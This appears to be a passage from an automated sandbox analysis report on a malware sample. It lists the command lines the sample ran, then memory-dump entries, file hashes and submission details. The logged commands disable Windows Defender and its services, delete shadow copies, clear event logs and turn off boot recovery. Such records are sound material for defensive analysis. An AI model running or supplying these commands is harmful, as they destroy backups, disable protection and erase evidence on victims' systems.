C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
memory/588-54-0x0000000000000000-mapping.dmp
memory/544-55-0x0000000000000000-mapping.dmp
memory/1116-56-0x0000000000000000-mapping.dmp
memory/1072-57-0x0000000000000000-mapping.dmp
memory/1628-58-0x0000000000000000-mapping.dmp
memory/1688-59-0x0000000000000000-mapping.dmp
memory/1768-60-0x0000000000000000-mapping.dmp
memory/396-61-0x0000000000000000-mapping.dmp
memory/1108-62-0x0000000000000000-mapping.dmp
memory/1100-63-0x0000000000000000-mapping.dmp
memory/1056-64-0x0000000000000000-mapping.dmp
memory/1808-65-0x0000000000000000-mapping.dmp
memory/1360-66-0x0000000000000000-mapping.dmp
memory/1368-67-0x0000000000000000-mapping.dmp
memory/1196-68-0x0000000000000000-mapping.dmp
memory/1332-69-0x0000000000000000-mapping.dmp
memory/1204-70-0x0000000000000000-mapping.dmp
memory/1476-71-0x0000000000000000-mapping.dmp
memory/2032-72-0x0000000000000000-mapping.dmp
memory/556-73-0x0000000000000000-mapping.dmp
memory/1836-74-0x0000000000000000-mapping.dmp
memory/680-75-0x0000000000000000-mapping.dmp
memory/912-76-0x0000000000000000-mapping.dmp
memory/1748-77-0x0000000000000000-mapping.dmp
memory/1596-78-0x0000000000000000-mapping.dmp
memory/1272-79-0x0000000000000000-mapping.dmp
memory/768-80-0x0000000000000000-mapping.dmp
memory/1072-81-0x0000000000000000-mapping.dmp
memory/1344-82-0x0000000000000000-mapping.dmp
memory/1484-83-0x0000000000000000-mapping.dmp
memory/1084-84-0x0000000000000000-mapping.dmp
memory/1088-85-0x0000000000000000-mapping.dmp
memory/1832-86-0x0000000000000000-mapping.dmp
memory/1368-87-0x0000000000000000-mapping.dmp
memory/1604-88-0x0000000000000000-mapping.dmp
memory/1212-89-0x0000000000000000-mapping.dmp
memory/1776-90-0x0000000000000000-mapping.dmp
memory/832-91-0x0000000000000000-mapping.dmp
memory/1216-92-0x0000000000000000-mapping.dmp
memory/1700-93-0x0000000000000000-mapping.dmp
memory/1740-94-0x0000000000000000-mapping.dmp
memory/1764-95-0x0000000000000000-mapping.dmp
memory/544-96-0x0000000000000000-mapping.dmp
memory/1676-97-0x0000000000000000-mapping.dmp
memory/436-98-0x0000000000000000-mapping.dmp
memory/1080-99-0x0000000000000000-mapping.dmp
memory/1304-100-0x0000000000000000-mapping.dmp
memory/1548-101-0x0000000000000000-mapping.dmp
memory/880-102-0x0000000000000000-mapping.dmp
memory/292-103-0x0000000000000000-mapping.dmp
memory/928-104-0x0000000000000000-mapping.dmp
memory/1908-105-0x0000000000000000-mapping.dmp
memory/1552-106-0x0000000000000000-mapping.dmp
memory/1496-107-0x0000000000000000-mapping.dmp
memory/1468-108-0x0000000000000000-mapping.dmp
memory/1100-109-0x0000000000000000-mapping.dmp
memory/1236-110-0x0000000000000000-mapping.dmp
memory/1028-111-0x0000000000000000-mapping.dmp
memory/1952-112-0x0000000000000000-mapping.dmp
memory/1952-113-0x000007FEFC511000-0x000007FEFC513000-memory.dmp
memory/860-114-0x0000000000000000-mapping.dmp
memory/1104-116-0x0000000000000000-mapping.dmp
memory/1712-118-0x0000000000000000-mapping.dmp
memory/1888-119-0x0000000000000000-mapping.dmp
memory/1924-120-0x0000000000000000-mapping.dmp
memory/852-122-0x000007FEF38E0000-0x000007FEF443D000-memory.dmp
memory/852-123-0x00000000022A0000-0x00000000022A2000-memory.dmp
memory/852-124-0x00000000022A2000-0x00000000022A4000-memory.dmp
memory/852-125-0x00000000022A4000-0x00000000022A7000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| Hash | Value |
|---|---|
| MD5 | 167090a23e64847bcc9891c90b399071 |
| SHA1 | 8bf9030451446825ac778dd9f0d42e564a5166ba |
| SHA256 | 2f6c04e155715a2efb59427bc2a4941c622fa9d51446b925a59a34cf323bbf48 |
| SHA512 | 529f1926c5741c272cafb437c7903e24f36fdbb0cc8ae2a0d8bdb93cd3a8be4386559f73ba2d09c18b36f3bd9e29081d782179427b7ea3cd090a6a28404c188a |
memory/852-128-0x00000000022AB000-0x00000000022CA000-memory.dmp
memory/2112-129-0x000007FEF2F40000-0x000007FEF3A9D000-memory.dmp
memory/2112-131-0x0000000002452000-0x0000000002454000-memory.dmp
memory/2112-130-0x0000000002450000-0x0000000002452000-memory.dmp
memory/2112-133-0x000000000245B000-0x000000000247A000-memory.dmp
memory/2112-132-0x0000000002454000-0x0000000002457000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-12 16:49
Reported
2022-01-12 16:49
Platform
win10-en-20211208